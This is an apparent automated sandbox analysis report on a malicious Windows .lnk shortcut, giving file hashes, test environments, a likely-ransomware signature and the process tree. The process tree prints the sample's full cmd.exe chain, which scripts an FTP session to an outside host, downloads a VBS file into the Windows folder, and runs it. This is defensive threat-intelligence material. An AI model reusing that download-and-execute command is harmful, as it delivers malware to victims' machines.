Analysis
- max time kernel: 7s
- max time network: 46s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 28-10-2022 23:08
Static task: static1
Behavioral task: behavioral1
- Sample: 8533fdd14f843d95bf261e4226416aa1326a8dba714732a47363c2f8ab8467ef.lnk
- Resource: win7-20220812-en
Behavioral task: behavioral2
- Sample: 8533fdd14f843d95bf261e4226416aa1326a8dba714732a47363c2f8ab8467ef.lnk
- Resource: win10v2004-20220812-en
General
- Target: 8533fdd14f843d95bf261e4226416aa1326a8dba714732a47363c2f8ab8467ef.lnk
- Size: 2KB
- MD5: 0ad6820546ab727a967b6ec4eaa3da60
- SHA1: 0bff1501b8b2df52be0a5250123e668b50f96af2
- SHA256: 8533fdd14f843d95bf261e4226416aa1326a8dba714732a47363c2f8ab8467ef
- SHA512: 0636a406076c783b840f0a3cd44ed6a74d1dc16ebf941ddb3630a5d9c842f49aef20e8a90eafd9ca7f5877674a4385b858e80d801899dc61a28310df92555703
Malware Config
Signatures
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Processes
- C:\Windows\system32\cmd.exe (PID 4988)
  cmd /c C:\Users\Admin\AppData\Local\Temp\8533fdd14f843d95bf261e4226416aa1326a8dba714732a47363c2f8ab8467ef.lnk
  - C:\WINDOWS\system32\cmd.exe (PID 3320)
    "C:\WINDOWS\system32\cmd.exe" /c echo open btfew.3322.org>>m.t&echo 123>>m.t&echo 123>>m.t&echo get jnj C:\Windows\link.vbs>>m.t&echo bye>>m.t&ftp -s:m.t& del m.t&start C:\Windows\link.vbs
    - C:\Windows\system32\ftp.exe (PID 4956)
      ftp -s:m.t
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 65B
- MD5: 6b395d25b50e046503334a2b080f96c9
- SHA1: 95d7bd2428541fdad546974733b91c6797307d31
- SHA256: 6b7cdf0009c19b0e0d61511232b405d962fb48a26e2116a6227780c7073cbad3
- SHA512: 32f193e0febe4724def611bb8aaf5ba51a3055473116b686d43c9b4f5908e8b89bb48a8ea9f277d38a99e406160658af8e4c725c888d6885f651b85b4f71f8c3